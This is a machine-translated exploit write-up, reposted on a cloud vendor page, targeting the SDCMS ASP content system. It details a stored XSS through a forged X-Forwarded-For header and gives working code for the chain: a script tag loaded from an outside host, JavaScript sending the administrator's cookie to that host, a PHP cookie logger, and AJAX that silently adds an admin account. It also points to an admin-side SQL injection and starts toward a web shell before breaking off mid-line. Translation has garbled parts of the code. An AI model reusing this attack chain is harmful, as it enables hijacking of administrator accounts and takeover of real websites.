0-day SDCMS Vulnerability Analysis

Source: Internet
Author: User

Author: Amxking
Vulnerability Analysis:
Let's take a look at the following code:
 
(Note: This method can be used only when the Administrator permits comments. However, the Administrator generally allows comments)
 
In/plug/comment. asp

Sub save_comment
 
......
 
Username = sdcms_f.HTMLEncode (username)
 
Content = sdcms_f.contentEncode (content)
 
Ip = sdcms_f.getip 'Please refer to here and get your IP address here.
 
 
Set rs = server. CreateObject ("adodb. recordset ")
 
SQL = "select username, content, ip, infoid, ispass from sd_comment"
 
Rs. open SQL, conn, 1, 3
 
Rs. addnew
 
Rs (0) = left (username, 10)
 
Rs (1) = content
 
Rs (2) = ip // No filtering, directly inserted into the database.
 
Rs (3) = id
 
If sdcms_comment_ispass = 1 then
 
Msg_contents = ", please wait for review"
 
Rs (4) = 0
 
Else
 
Rs (4) = 1
 
End if
 
Rs. update
 
......
 
End sub

Let's take a look at the implementation of getip,
 
In/inc/function. asp

Public Function getip
 
Ip = request. ServerVariables ("HTTP_X_FORWARDED_FOR ")
 
If ip = "" then ip = Request. ServerVariables ("REMOTE_ADDR ")
 
Getip = ip
 
End function

We all know that the problem exists. The author uses the "HTTP_X_FORWARDED_FOR" field to obtain the IP value. We know that this field can be forged in data packets.
 
We can forge data packets and change the value of "HTTP_X_FORWARDED_FOR" to a single-statement trojan for submission. In this way, a single-statement Trojan is directly inserted into the database. if we know the database location and the database suffix is asp, we can directly use it.
 
Unfortunately, the name of the CMS database is unknown. During installation, 12 random characters are generated by the following code, and the suffix is still mdb. Therefore, we need to insert a sentence, it cannot be used either.
 
/Install/index. asp
 
Function get_something
 
Randomize
 
Do While Len (pass) <12 random password digits
 
Num1 = CStr (Chr (57-48) * rnd + 48) 0 ~ 9
 
Num2 = CStr (Chr (90-65) * rnd + 65) ~ Z
 
Num3 = CStr (Chr (122-97) * rnd + 97) ~ Z
 
Pass = pass & num1 & num2 & num3
 
Loop
 
Get_something = pass
 
End function
 
We want to use another method for intrusion.
 
See the following code:
 
/Admin/sdcms_comment.asp
 
Sub main
 
Echo "<form name =" "add" "action = ""? "" Method = "" post "" onSubmit = "" return confirm (Are you sure you want to perform the selected operation ?); "">"
 
Page = request. querystring ("page ")
 
If page = "" or not isnumeric (page) then
 
Page = 1
 
End if
 
Pages = 20
 
Set rs = server. CreateObject ("adodb. recordset ")
 
If request ("classid") <> 0 then tj = "where infoid =" & request ("classid") & "'has an injection vulnerability, although classid = sdcms is used above. requestint (classid) to obtain its integer, but when it is stored in SQL, it does not use classid for query, but directly uses request ("classid") for query, when preventing injection, the author does not filter its values, so it can be injected. However, the premise of this injection is that it has the Administrator permission. Therefore, we will not discuss it.

SQL = "select id, username ,"
 
If Is_ SQL = 0 then
 
SQL = SQL & "(iif (ispass = 1, reviewed, not reviewed ))"
 
Else
 
SQL = SQL & "(case ispass when 1 then audited else unaudited end )"
 
End if
 
SQL = SQL & ", ip, adddate, content, ispass, infoid from" & sd_table & "& tj &" order by ispass, id desc"
 
'The author uses SQL statements to directly find the IP address value and uses the following code to display it on the page without any filtering.
 
<Td class = "title_bg" style = "text-align: left"> <span style = "float: right"> <% if rs (6) = 0 then %> <a href = "? Action = pass & id = <% = rs (0) %> & t = 1 & classid = <% = classid %> "> Verification passed </a> <% else %> <a href = "? Action = pass & id = <% = rs (0) %> & t = 0 & classid = <% = classid %> "> cancel verification </a> <% end if %> <a href = "? Action = del & id = <% = rs (0) %> & classid = <% = classid %> "onclick = return confirm (" are you sure you want to delete it? Cannot be recovered! ");> Delete </a> </span> <input name =" id "type =" checkbox "onClick =" unselectall () "value =" <% = rs (0) %> "> <% = rs (1) %> published on: <% = rs (4) %> IP: <% = rs (3) %> </td>

We take into account xss attacks and execute malicious JavaScript code when the Administrator checks and reviews the comments.
 
The concept of Xss is not detailed here, we assign the value of "HTTP_X_FORWARDED_FOR" to <script src = http://www.xuehi.com/test.js> </script> (we write malicious js to test. js)
 
Then submit. The method submitted here is no longer cumbersome. You can use nc to capture packets and submit it. You can also find a ready-made tool for submission. Of course, you can also write your own program for submission.
 
Note that the default ip address field of the recipient is 50 characters long, so we need to control this length.
 
For this CMS, the cookie consists of 12 characters customized by the author, the administrator username, And the md5 password,
 
Therefore, when we get the cookie, we basically get the background permission.
 
The following describes how to implement test. js,
 
If

 
Alert (document. cookie)
 
In this way, the author will pop up his cookie during review. of course we won't use it that way. We need to send cookies to remote servers. the following code should not be unfamiliar.
 
Test. js content:
 
Var img = new Image ();
 
Img. src = "http://www.xuehi.com/test.php? Cookie = "+ document. cookie;
 
The content of Test. php is as follows:
 
<? Php <br/> Fputs(fopen('a.txt ', 'a +'), $ _ GET ['cookies']. '//'); <br/> <br/>?> </P> <p> in this example, the Administrator generates a.txt on our server, which contains the Administrator's cookie. <br/> if we have a cookie, we have an administrator identity. <br/> go to the background and modify the cookie. <br/> Of course, you can also use ajax to allow the Administrator to add an account. The method is as follows: <br/> function getXHR () {<br/> var xhr = null <br/> if (window. XMLHttpRequest) {<br/> xhr = new XMLHttpRequest (); <br/>} else if (window. createRequest) {<br/> xhr = window. createReq Uest (); <br/>} else if (window. activeXObject) {<br/> try {<br/> xhr = new ActiveXObject (Msxml2.XMLHTTP ); <br/>} catch (E) {<br/> try {<br/> xhr = new ActiveXObject (Microsoft. XMLHTTP); <br/>} catch (E) {}< br/> <br/>}< br/> <br/> return xhr; <br/> <br/>}< br/> <br/> var ajax = getXHR (); <br/> ajax. open (POST,/admin/sdcms_admin.as P?? Action = save & act = add, false); <br/> ajax. setRequestHeader ("Content-Type", "application/x-www-form-urlencoded"); <br/> ajax. send ("t0 = test & t1 = test & t2 = 1 ");
 
After the Administrator browses the comments, an account is automatically added.
 
I mentioned this in my previous articles, so I will not elaborate on it.
 
Next we will show you how to use shell. Let's take a look at the code of the configuration written in the background:
 
In/admin/sdcms_set.asp

Set fso = server. CreateObject ("scripting. filesystemobject ")
 
Set info = fso. CreateTextFile (Server. mappath ("../inc/const. asp"), true)
 
Info. write "<" & "%" & vbcrlf
 
......
 
Info. write "%" & ">"
 
Info. close
 
Set info = nothing
 
Set fso = nothing

The author writes the configuration file to/inc/const. asp,
 
In

Sub save
 
T0 = clear_bad (trim (request ("t0 ")))
 
T1 = clear_bad (trim (request ("t1 ")))
 
T2 = clear_bad (trim (request ("t2 ")))
 
T3 = clear_bad (trim (request ("t3 ")))
 
T4 = clear_bad (trim (request ("t4 ")))
 
T5 = clear_bad (trim (request ("t5 ")))
 
T6 = clear_bad (trim (request ("t6 ")))
 
T7 = clear_bad (trim (request ("t7 ")))
 
T8 = clear_bad (trim (request ("t8 ")))
 
T9 = clear_bad (trim (request ("t9 ")))
 
T10 = clear_bad (trim (request ("t10 ")))
 
T11 = clear_bad (trim (request ("t11 ")))
 
T12 = clear_bad (trim (request ("t12 ")))
 
T13 = trim (requ

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.